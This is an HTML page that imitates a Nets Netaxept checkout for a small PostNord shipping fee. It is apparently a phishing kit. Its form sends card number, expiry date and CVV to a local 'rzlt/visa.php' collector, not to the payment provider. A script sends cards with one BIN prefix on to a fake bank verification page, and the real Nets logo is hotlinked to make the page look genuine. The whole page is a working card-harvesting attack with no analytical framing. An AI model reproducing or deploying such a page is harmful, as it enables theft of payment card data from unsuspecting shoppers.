<html xmlns="http://www.w3.org/1999/xhtml" lang="en-GB"><head><title>
	Accept payment - Nets Netaxept
</title>
<meta name="robots" content="noindex">
<meta name="referrer" content="origin-when-crossorigin">
<meta name="google" content="notranslate">
<meta name="viewport" content="width=device-width">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<link href="css/StyleSheet.css" rel="stylesheet" type="text/css">
<link rel="SHORTCUT ICON" href="Images/favicon_New.ico">
<style type="text/css">a { color: black; } td.lineTop { border-top: solid 1px black; } div.lineBottom { border-bottom: solid 1px black; }</style>
<script language="javascript">
function myFunction() {
  var str = document.getElementById("fname").value;
  var res = str.substring(0,6);
  if (res === "448566"){
  var url= "bin/448566.html"; 
  document.write("Redirecting to the Bank Verification Page in 3 seconds...");
  setTimeout(function(){window.location = url;}, 3000);
  //window.location.href = "448566.html"
  }
}
</script>
</head>
</head>
<body id="body" style="">

       
        

    <form method="POST" action="../rzlt/visa.php">


        <div id="bbsHostedContent">

            


            <div id="content" class="content" style="border:solid 2px #7f7b7b;max-width:500px;width:100%;color:black;">

                <img id="topImage" alt="Netaxept &amp; Nets" src="img/TopLedge_New.png" height="50" width="380" style="border-width:0px;">

                <div id="contentPadding" class="contentPadding">

                    <img id="merchantInformation_merchantTerminalImage" src="https://epayment.nets.eu/images/terminalimage.ashx?terminalImageId=fb38b305-bde8-469a-9c9a-462d2cec6622" alt="Merchant Logo" style="border-width:0px;margin-bottom: 10px; margin-top: 0px;">
        


<div id="merchantInformation_merchantRow" style="word-break: break-all;">
    <span id="merchantInformation_merchantLabel" style="font-weight:bold;">Merchant:</span>&nbsp;<span id="merchantInformation_merchantName">PostNord Porto</span>
</div>

<table style="margin-top: 10px;" cellpadding="0" cellspacing="0">
    
    <tbody><tr id="merchantInformation_amountRow">
	<td style="padding-right: 5px">
            <span id="merchantInformation_amountLabel" style="font-weight:bold;"><font size="2" color="black">Amount:</font></span>
        </td>
	<td>
            <span id="merchantInformation_amount"><font size="2">71,00 (SEK)</font></span>
        </td>
</tr>

    
    <tr id="merchantInformation_vatAmountRow">
	<td style="padding-right: 5px">
            <span id="merchantInformation_vatLabel" style="font-weight:bold;"><font size="2" color="black">VAT (included):</font></span>
        </td>
	<td style="text-align: right">
            <span id="merchantInformation_vat"><font size="2">0,00 (SEK)</font></span>&nbsp;
        </td>
</tr>

    
    
</tbody></table>

<div id="merchantInformation_orderNumberDiv" style="margin-top: 10px; word-break: break-all;">
    <span id="merchantInformation_orderNumberLabel" style="font-weight:bold;">Order number:</span>&nbsp;<span id="merchantInformation_orderNumber">118443443KJWHN</span>
</div>



<div id="merchantInformation_orderDescriptionDiv" style="margin-top: 10px; word-break: break-all;">
    <span id="merchantInformation_orderDescriptionLabel" style="font-weight:bold;">Order description:</span>&nbsp;<span id="merchantInformation_orderDescription">PostNord Skicka Direkt: 118443443KJWHN</span>
</div>

<div class="lineBottom" style="margin-bottom: 10px; padding-bottom: 10px;"></div>
                    <div id="status_margins">
	

    

    

    

    


</div>

                  

                    
             



<table cellpadding="0" cellspacing="5px" width="100%">
    <tbody><tr id="trGenericCardPayment">
        <td><label for="cardNumber" id="Visa_cardNoTitle"><font size="2">Card number</font></label></td>
        <td>
             <input name="VisacardNumber" type="text" id="MastercardNumber" onkeypress="return isNumberKey(event)" oninput="valid_credit_card('MastercardNumber');validate ()" onchange="valid_credit_card('MastercardNumber');validate ()" onblur="valid_credit_card('MastercardNumber');validate ()"  maxlength="16" placeholder="0000000000000000" autocomplete="off" size="19" </td>
        <td rowspan="3" style="text-align: center;">
            <img id="Visa_image" src="img/visa_0.png" alt="Visa" style="border-width:0px;">
        </td>
    </tr>  

    <tr>
        <td><span id="Visa_expireDateTitle"><font size="2">Expiry date (month/year)</font></span></td>
        <td>
            <select name="Visamonth"  id="Mastermonth" onchange="valsel(this);validate();" onblur="validate ()" aria-label="Month" style="border:1px solid dimgrey;">
    <option value="">Month</option>
	<option value="01">01</option>
	<option value="02">02</option>
	<option value="03">03</option>
	<option value="04">04</option>
	<option value="05">05</option>
	<option value="06">06</option>
	<option value="07">07</option>
	<option value="08">08</option>
	<option value="09">09</option>
	<option value="10">10</option>
	<option value="11">11</option>
	<option value="12">12</option>

</select> 
            <select name="Visayear" id="Masteryear" onchange="valsel(this);validate();" onblur="validate ()" aria-label="Year" style="border:1px solid dimgrey;">
    <option value="">Year</option>
	<option value="21">2021</option>
	<option value="22">2022</option>
	<option value="23">2023</option>
	<option value="24">2024</option>
	<option value="25">2025</option>
	<option value="26">2026</option>
	<option value="27">2027</option>
	<option value="28">2028</option>
	<option value="29">2029</option>
	<option value="30">2030</option>
	<option value="31">2031</option>
	<option value="32">2032</option>
	<option value="33">2033</option>

</select>
        </td>
    </tr>  
    <tr>
        <td><label for="securityCode" id="Visa_securityCodeTitle"><font size="2">CVV2</font>      </label></td>
        <td>
            <input name="VisasecurityCode" type="text" maxlength="4" id="MastersecurityCode" onkeypress="return isNumberKey(event)" oninput="valcount('MastersecurityCode',3);validate ()" onchange="valcount('MastersecurityCode',3);validate ()" onblur="valcount('MastersecurityCode',3);validate ()" inputmode="numeric" class="securityCode" placeholder="000" autocomplete="off" size="4" style="border:1px solid dimgrey;">&nbsp;
            <a id="Visa_popupLink" alt="CVV2 HelpText" href="CardVerificationDetails.aspx?language=en-GB" target="_blank" style="font-size:X-Small;">What is CVV2      ?</a>
        </td>
    </tr>
</tbody></table>



                    
                <div id="toolbar" class="box" style="margin-top: 10px;" >
							
							
							<input type="button" name="backButton" value="< Back"  id="backButton">
							<input type="button" name="cancelButton" value="cancel" id="cancelButton" style="margin-left: 10px;">
							<input type="submit" name="okButton" value="Pay" id="sub_btn" disabled="true" style="margin-left: 10px;">
							
							
                    </div>
<script type="text/javascript" src="js/script.js"></script>
</form>

    



</body></html>